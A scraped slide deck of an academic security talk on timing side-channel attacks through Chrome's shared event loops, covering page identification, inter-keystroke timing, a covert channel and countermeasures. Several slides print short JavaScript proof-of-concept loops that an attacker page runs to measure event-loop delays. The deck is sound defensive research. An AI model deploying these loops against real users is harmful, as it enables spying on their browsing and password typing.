Loophole: Timing Attacks on Shared Event Loops in Chrome Pepe Vila - - PowerPoint PPT Presentation

loophole timing attacks on shared event loops in chrome
SMART_READER_LITE
LIVE PREVIEW

Loophole: Timing Attacks on Shared Event Loops in Chrome Pepe Vila - - PowerPoint PPT Presentation

Apr 21, 2023 420 likes •1.06k views

Loophole: Timing Attacks on Shared Event Loops in Chrome Pepe Vila and Boris Kpf vwzq.net @cgvwzq github.com/cgvwzq DISCLAIMER: CRYPTACUS DISCLAIMER: CRYPTACUS DISCLAIMER: CRYPTACUS (its funny because its very ubiquitous)

slide-1
SLIDE 1

Loophole: Timing Attacks on Shared Event Loops in Chrome

Pepe Vila and Boris Köpf

vwzq.net @cgvwzq github.com/cgvwzq

slide-2
SLIDE 2

DISCLAIMER:

CRYPTACUS

slide-3
SLIDE 3

DISCLAIMER:

CRYPTACUS

slide-4
SLIDE 4

DISCLAIMER:

CRYPTACUS

(it’s funny because it’s very ubiquitous…)

slide-5
SLIDE 5

DISCLAIMER:

CRYPTACUS

(it’s funny because it’s very ubiquitous…)

slide-6
SLIDE 6

Event-driven programming

slide-7
SLIDE 7

Source: http://berb.github.io/diploma-thesis/original/042_serverarch.html

slide-8
SLIDE 8

FIFO queue Dispatcher

time

Shared Event Loop

slide-9
SLIDE 9

FIFO queue Dispatcher

time

e0

Shared Event Loop

slide-10
SLIDE 10

FIFO queue Dispatcher

time

e0

Shared Event Loop

slide-11
SLIDE 11

FIFO queue Dispatcher

time

e1 e0

Shared Event Loop

slide-12
SLIDE 12

FIFO queue Dispatcher

time

e1 e0

Shared Event Loop

slide-13
SLIDE 13

FIFO queue Dispatcher

time

e0 e1

Shared Event Loop

slide-14
SLIDE 14

FIFO queue Dispatcher

time

e0 e1 e2

Shared Event Loop

slide-15
SLIDE 15

FIFO queue Dispatcher

time

e0 e1 e2

Shared Event Loop

slide-16
SLIDE 16

FIFO queue Dispatcher

time

e0 e2 e1

Shared Event Loop

slide-17
SLIDE 17

FIFO queue Dispatcher

time

e0 e1 e2

Shared Event Loop

slide-18
SLIDE 18

FIFO queue Dispatcher

time

e0 e1 e2

Shared Event Loop

slide-19
SLIDE 19

FIFO queue Dispatcher

time

e0 e1 e2 e3

Shared Event Loop

slide-20
SLIDE 20

FIFO queue Dispatcher

time

e0 e1 e2 e3

Shared Event Loop

slide-21
SLIDE 21

FIFO queue Dispatcher

time

e0 e1 e3 e2

Shared Event Loop

slide-22
SLIDE 22

FIFO queue Dispatcher

time

e0 e1 e2 e3

Shared Event Loop

slide-23
SLIDE 23

FIFO queue Dispatcher

time

e0 e1 e2 e3

Shared Event Loop

slide-24
SLIDE 24

FIFO queue Dispatcher

time

e0 e1 e2 e3 e4

Shared Event Loop

slide-25
SLIDE 25

FIFO queue Dispatcher

time

e0 e1 e2 e4 e3

Shared Event Loop

slide-26
SLIDE 26

FIFO queue Dispatcher

time

e0 e1 e2 e3 e4

Shared Event Loop

slide-27
SLIDE 27

FIFO queue Dispatcher

time

e0 e1 e2 e3 e4

Shared Event Loop

slide-28
SLIDE 28

FIFO queue Dispatcher

time

d0 d1 d2 d3

e0 e1 e2 e3 e4

Shared Event Loop

slide-29
SLIDE 29

FIFO queue Dispatcher

time

Event-delay trace

d0 d1 d2 d3

e0 e1 e2 e3 e4

Shared Event Loop

slide-30
SLIDE 30

We exploit 2 different shared Event Loops in Chrome:

slide-31
SLIDE 31

We exploit 2 different shared Event Loops in Chrome:

I/O’s of the Host Process Main thread’s of Renderers

slide-32
SLIDE 32

We exploit 2 different shared Event Loops in Chrome:

I/O’s of the Host Process Main thread’s of Renderers

And implement 3 different attacks:

slide-33
SLIDE 33

Page Identification

And implement 3 different attacks: We exploit 2 different shared Event Loops in Chrome:

I/O’s of the Host Process Main thread’s of Renderers

slide-34
SLIDE 34

And implement 3 different attacks:

19780.000 19785.000 19790.000 19795.000 19800.000 0.02 0.04 0.06 0.10 0.20 0.40 1.00 2.00 4.00 10.00

Inter-keystroke Timing Page Identification

We exploit 2 different shared Event Loops in Chrome:

I/O’s of the Host Process Main thread’s of Renderers

slide-35
SLIDE 35

We exploit 2 different shared Event Loops in Chrome:

I/O’s of the Host Process Main thread’s of Renderers

And implement 3 different attacks:

Page Identification Covert Channel

19780.000 19785.000 19790.000 19795.000 19800.000 0.02 0.04 0.06 0.10 0.20 0.40 1.00 2.00 4.00 10.00

Inter-keystroke Timing

slide-36
SLIDE 36

SYSTEM/INTERNET

slide-37
SLIDE 37

HOST PROCESS SYSTEM/INTERNET

slide-38
SLIDE 38

HOST PROCESS SYSTEM/INTERNET

  • NETWORK REQUESTS
  • IPC COMMUNICATION
  • DISPATCHES USER

ACTIONS

slide-39
SLIDE 39

HOST PROCESS SYSTEM/INTERNET

RENDERER 1 RENDERER 2 tab1 | trusted.com tab 2 | SHARED BETWEEN ALL RENDERERS

slide-40
SLIDE 40

HOST PROCESS SYSTEM/INTERNET

RENDERER 1 RENDERER 2 tab1 | trusted.com tab 2 |

slide-41
SLIDE 41

HOST PROCESS SYSTEM/INTERNET

RENDERER 1 RENDERER 2 tab1 | trusted.com tab 2 | evil.com

slide-42
SLIDE 42

<script>
 function loop () { save(performance.now()); fetch(new Request("http://0/")) .catch(loop); } loop(); </script>

Timing resolution of ~500 μs

Spying on the Host

slide-43
SLIDE 43

Timing resolution of ~500 μs With SharedWorkers we obtain <100 μs

<script>
 function loop () { save(performance.now()); fetch(new Request("http://0/")) .catch(loop); } loop(); </script>

Spying on the Host

slide-44
SLIDE 44

HOST PROCESS SYSTEM/INTERNET

RENDERER 1 tab1 | trusted.com

slide-45
SLIDE 45

HOST PROCESS SYSTEM/INTERNET

RENDERER 1

  • JAVASCRIPT EXECUTION
  • RESOURCE PARSING
  • LAYOUT & RENDERING

tab1 | trusted.com

slide-46
SLIDE 46

HOST PROCESS SYSTEM/INTERNET

RENDERER 1 iframe |

SHARED BETWEEN IFRAMES, POPUPS, MAX #RENDERER EXCEEDED…

tab1 | trusted.com

slide-47
SLIDE 47

HOST PROCESS SYSTEM/INTERNET

RENDERER 1 iframe | evil.co tab1 | trusted.com

slide-48
SLIDE 48

<script>
 function loop() { save(performance.now()); self.postMessage(0, "*"); } self.onmessage = loop; loop(); </script>

Timing resolution of <25 μs

Spying on the Renderer

slide-49
SLIDE 49

LoopScan Tool

https://github.com/cgvwzq/loopscan

slide-50
SLIDE 50

Web Page Identification & Inter-keystroke Timing

slide-51
SLIDE 51

Web Page Identification

Monitor the EventLoop while page loading

slide-52
SLIDE 52

Dynamic Time Warping

DTW is resistant to delays in the occurrence of events

slide-53
SLIDE 53

Dynamic Time Warping

DTW is resistant to delays in the occurrence of events

2-4 seconds of measuring

slide-54
SLIDE 54

Dynamic Time Warping

DTW is resistant to delays in the occurrence of events

2-4 seconds of measuring One trace for training

slide-55
SLIDE 55

Web Page Identification

500 pages x 30 traces x 3 machines x 2 event loops

Renderer’s main thread: Host’s I/O thread:

75%

23%

(Linux desktop) (Macbook Pro)

(recognition rates below 5% across machines) R-library and datasets:
 https://github.com/cgvwzq/rlang-loophole

slide-56
SLIDE 56

Inter-keystroke Timing

19780.000 19785.000 19790.000 19795.000 19800.000 19805.000 0.02 0.04 0.06 0.10 0.20 0.40 1.00 2.00 4.00 10.00

We obtain the password length and
 time between consecutive pressed keys

slide-57
SLIDE 57

Inter-keystroke Timing

10.000 passwords 90% accuracy precision: σ = 6.1 ms

slide-58
SLIDE 58

Inter-keystroke Timing

More precision than network based attacks. Less noise than in micro-architectural attacks. No privileges. No training. 10.000 passwords 90% accuracy precision: σ = 6.1 ms

slide-59
SLIDE 59

Countermeasures

  • Reduce clock resolution
  • Site Isolation Project
  • CPU throttling
  • Rate limiting
slide-60
SLIDE 60

Countermeasures

  • Reduce clock resolution
  • Site Isolation Project
  • CPU throttling
  • Rate limiting
slide-61
SLIDE 61

Conclusions

  • Shared event loops in Chrome are vulnerable to

timing side-channels

  • We systematically study how this channel can be

used for different attacks

  • Fundamental design issues that need to be

addressed

slide-62
SLIDE 62

62

Thank you! :)

Questions?